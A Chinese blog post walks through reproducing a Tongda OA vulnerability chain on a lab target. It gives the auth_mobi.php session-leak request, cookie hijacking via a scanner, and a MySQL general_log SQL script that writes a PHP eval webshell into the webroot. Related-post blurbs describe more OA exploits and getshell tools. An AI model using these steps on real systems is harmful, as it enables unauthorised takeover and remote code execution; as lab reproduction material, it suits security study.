通达OA漏洞复现

最新推荐文章于 2024-05-17 08:10:09 发布
最新推荐文章于 2024-05-17 08:10:09 发布
阅读量1.6k 收藏 5
点赞数 1
分类专栏: 渗透 文章标签: 编程语言 c++ sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44831109/article/details/123841373
版权

1.靶场http://172.168.20.38/
2.使用http://xx.xx.xx.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
即http://172.168.20.38/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
在这里插入图片描述
发现显示relogin证明网站前没有人在线,需要等待有人登录的时候在尝试

如果页面啥也没显示着则使用http://xx.xx.xx.xx/general/再次访问后台地址
即可以直接进入后台
由于我这边显示relogin,所以要使用另一种方法
1.使用goby扫描
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
浏览器替换cookie,将刚刚goby出来的验证信息复制到浏览器的cookie里

在这里插入图片描述
成功获取获取进入后
在这里插入图片描述
进入后台找能上传文件的地方
系统管理–>数据库管理–>数据库脚本导入
在这里插入图片描述
导入一个sql脚本

set global general_log = on;
set global general_log_file ='C://MYOA//webroot//abc.php';
select '<?php eval($_POST[11]);?>';
set global general_log = off;

在这里插入图片描述
访问abc,php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述直接是administrators 不用提权啦

乐事星期八
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA getcallist存在前台SQL注入漏洞
xiaokp7的博客
02-18 188
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA getcallist存在前台SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
漏洞复现-通达OA通达OA WHERE_STR 存在前台SQL注入漏洞
xiaokp7的博客
02-18 439
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
通达OA漏洞复现快准狠
最新发布
05-29
通达OA漏洞复现快准狠
漏洞复现-通达TongdaOA系列
aming小老弟
10-03 4224
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台2015年,通达OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
Innocence_0的博客
05-17 782
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2442
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 6229
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
自主搭建的三层网络域渗透靶场打靶记录
Innocence_0的博客
08-01 753
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞
通达V11.7auth_mobi.php任意用户登录漏洞复现
qq_44828901的博客
06-19 814
傻瓜式复现通达V11.7auth_mobi.php任意用户登录
通达OA v11.7 在线任意用户登录漏洞
qq_44657899的博客
06-26 5455
漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 漏洞影响 通达OA V11.7 漏洞复现 首先访问http://xxx. xxx . xxx . xxx /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 ,如果页面时空白的,则说明管理员在线,即可以利用。 已经获取到了cookie,此时再访问http://xx.x
TongDa_Scan:通达OA在线用户登录poc
03-13
进攻简述 通达OA v11.7中存在某接口查询在线用户,当用户在线时会返回PHPSESSION实现可登录后台系统 影响版本 通达OA <v11.7 进攻利用 检测当前用户是否存在线 http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 不在线 不在线显示RELOGIN 在线 在线页面空白,但已拿到SESSION 设置Cookie可直接登录后台 http://127.0.0.1/general/index.php 工具利用 # 指定 URL python3 .\TongDa_Scan.py -u 127.0.0.1 # 指定 uid 进行扫描 python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1 # 批量扫描,默认扫描UID为1 python3 .\TongDa_Scan.py -f .
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试版本 <v11.5 v2017 遵守《网络安全法》,不要用于非法用途 参考
通达OA综合利用工具通达OA综合利用工具
03-29
**通达OA综合利用工具_20200224** ## 集成POC如下 任意用户登录POC: 4个 SQL注入POC: 2个 后台文件上传POC: 3个 本地文件包含POC: 2个 前台文件上传POC(非WEB目录): 1个 ...
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA sql注入漏洞.zip
08-24
该压缩包文件“通达OA sql注入漏洞.zip”包含了与这个特定漏洞相关的材料。`README.md`文件通常会提供项目简介、如何运行和验证漏洞的步骤,以及可能的安全建议。`CVE-2023-4166.py`很可能是一个Python脚本,设计...
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 9996
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
内网渗透学习(三层网络拓扑)红日靶场
叶子的Blog
05-05 3306
环境搭建 配置虚拟机网卡 在Vmware中新增两个虚拟网卡VMnet8、VMnet14。VMnet8设为默认的NAT模式,IP段设为192.168.52.0/24;VMnet14设为仅主机模式,IP段设为192.168.93.0/24 环境信息 DMZ区的 Ubuntu 需要启动redis和nginx服务: sudo redis-server /etc/redis.conf sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo iptables -F
致远oa a8漏洞复现
08-01
致远OA A8存在远程任意文件上传漏洞,攻击者可以利用该漏洞在未授权的情况下上传恶意文件并执行任意代码。漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。[1] 要复现致远OA A8漏洞,可以按照以下步骤进行操作: 1. 首先访问目标网站的/seeyon/htmlofficeservlet目录,如果访问成功,说明该网站很有可能存在漏洞。[3] 2. 如果目标网站存在漏洞,可以尝试使用爆破工具或者常见的弱口令进行登录,例如密码为123456等。如果成功登录,说明存在弱口令漏洞。[2] 3. 如果弱口令无果,可以尝试寻找历史的漏洞利用工具(exp),并进行尝试。[2] 请注意,在进行漏洞复现时,务必遵守法律法规,仅用于合法的安全研究和测试目的。未经授权的攻击行为是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值